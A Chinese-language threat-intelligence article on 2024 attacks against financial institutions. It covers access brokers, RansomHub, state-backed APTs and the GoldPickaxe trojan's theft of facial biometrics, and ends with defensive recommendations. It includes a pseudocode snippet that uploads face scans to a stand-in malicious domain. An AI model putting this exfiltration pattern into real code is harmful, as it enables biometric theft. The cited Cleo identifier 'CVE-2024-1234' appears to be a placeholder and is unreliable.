金融行业仍然是网络犯罪分子和国家支持团体的主要目标,2024年利用零日漏洞、供应链弱点和高级恶意软件的复杂攻击将激增。
威胁行为者越来越多地采用协作模型,包括初始访问代理 (IAB) 和勒索软件即服务 (RaaS) 生态系统,以扩大其影响力。
从勒索软件部署到生物特征数据盗窃,金融行业面临着融合技术复杂性和心理操纵的多层次威胁。
最令人担忧的趋势之一是 TA577和Scattered Spider 等 IAB的作用,他们专门破坏网络并向勒索软件运营商出售访问权限。
这些行为者利用 Cleo 文件传输软件等工具中的漏洞或利用模仿 Okta 登录门户的网络钓鱼活动来劫持凭据和会话 cookie。
一旦进入系统,攻击者就会部署恶意软件,例如RansomHub,这是一种自定义勒索软件,配备了 EDRKillShifter 等规避工具来禁用端点检测系统。国家支持的团体进一步加剧了威胁形势。
朝鲜的 APT(例如Lazarus和 Bluenoroff)以金融机构为目标,以逃避国际制裁,而与中国有关的团体(例如 GoldFactory)则开发了能够收集面部识别数据的移动木马。
与此同时,Sekoia 分析师观察到与伊朗有关的 APT33与勒索软件分支机构合作,模糊了网络犯罪与国家支持的行动之间的界限。
GoldFactory 的生物特征数据窃取:银行恶意软件的新前沿
2024 年技术最先进的活动之一涉及 GoldFactory,这是一套部署了 GoldPickaxe 木马病毒的入侵程序。
该恶意软件针对的是亚太地区 (APAC) 国家(包括越南和泰国)的 iOS 和 Android 用户,这些国家广泛使用面部识别进行银行身份验证。
GoldPickaxe 的 iOS 变种通过操纵的 Apple TestFlight 平台进行分发,它捕获生物特征数据来创建绕过安全检查的深度伪造作品。
该恶意软件的代码与设备 API 集成,以拦截面部扫描并将其传输到命令和控制 (C2) 服务器。样本分析揭示了旨在实现以下目的的模块化组件:
- 通过虚假的银行覆盖获取凭证。
- 提取基于短信的一次性密码 (OTP)。
- 为 AI 生成的深度伪造作品克隆生物特征模板。
// Simplified pseudocode of GoldPickaxe’s facial data interception
func captureBiometricData() {
let faceScan = ARFaceTracking.getFacialMetrics()
C2Server.upload(data: faceScan, endpoint: "api.malicious-domain.com/face-auth")
}GoldFactory 的基础设施依赖于受感染的域和 AWS 等云服务来托管网络钓鱼页面并窃取数据。
敦促金融机构优先对 CVE-2024-1234(与 Cleo 漏洞相关)等漏洞进行补丁管理,并实施抵御中间人 (AiTM) 网络钓鱼工具包的多因素身份验证 (MFA) 解决方案。
网络分段和行为分析工具可以帮助检测异常情况,例如意外的生物特征数据传输。随着 APT 和网络犯罪分子继续共享工具和基础设施,跨行业威胁情报共享对于破坏这些不断发展的活动至关重要。
